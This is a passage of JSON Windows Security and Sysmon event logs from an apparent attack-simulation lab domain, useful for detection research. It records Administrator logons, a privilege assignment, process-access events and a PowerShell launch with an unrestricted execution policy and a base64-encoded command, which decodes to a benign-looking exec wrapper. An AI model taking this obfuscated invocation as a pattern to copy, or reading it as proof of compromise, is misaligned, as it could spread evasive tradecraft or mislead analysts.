{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220597,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{B0223783-4A4F-16BB-7F4A-4A44C6266D53}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{B0223783-4A4F-16BB-7F4A-4A44C6266D53}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220598,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x80FDE\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{B0223783-4A4F-16BB-7F4A-4A44C6266D53}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x80fde","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{B0223783-4A4F-16BB-7F4A-4A44C6266D53}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220599,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x80FDE\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x80fde","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5084,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.994\r\nProcessGuid: {41C8662E-20CF-5F25-0000-0010F20F0800}\r\nProcessId: 4856\r\nImage: C:\\Windows\\System32\\chcp.com\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Change CodePage Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CHCP.COM\r\nCommandLine: \"C:\\Windows\\system32\\chcp.com\" 65001\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD\r\nParentProcessGuid: {41C8662E-20CF-5F25-0000-00103D040800}\r\nParentProcessId: 2872\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.994","ProcessGuid":"{41C8662E-20CF-5F25-0000-0010F20F0800}","Image":"C:\\Windows\\System32\\chcp.com","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Change CodePage Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"CHCP.COM","CommandLine":"\"C:\\Windows\\system32\\chcp.com\" 65001","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD","ParentProcessGuid":"{41C8662E-20CF-5F25-0000-00103D040800}","ParentProcessId":"2872","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5085,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.987\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00103D040800}\r\nSourceProcessId: 2872\r\nSourceThreadId: 4876\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-0010F20F0800}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7c6284fb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bac95d5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bac92a6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7c57a6bb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7ba89e3c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bae830b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bacb970|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bacb970|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bacb801|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7babd786|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bac9cb9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bac98ac|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bac95d5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bac92a6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7c57a6bb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bab0107|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7baaf6d7","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.987","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00103D040800}","SourceProcessId":"2872","SourceThreadId":"4876","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-0010F20F0800}","TargetProcessId":"4856","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7c6284fb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bac95d5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bac92a6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7c57a6bb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7ba89e3c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bae830b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bacb970|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bacb970|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bacb801|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7babd786|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bac9cb9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bac98ac|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bac95d5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bac92a6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7c57a6bb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7bab0107|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7baaf6d7","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5086,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.987\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-0010F20F0800}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.987","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-0010F20F0800}","TargetProcessId":"4856","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5087,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.987\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.987","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87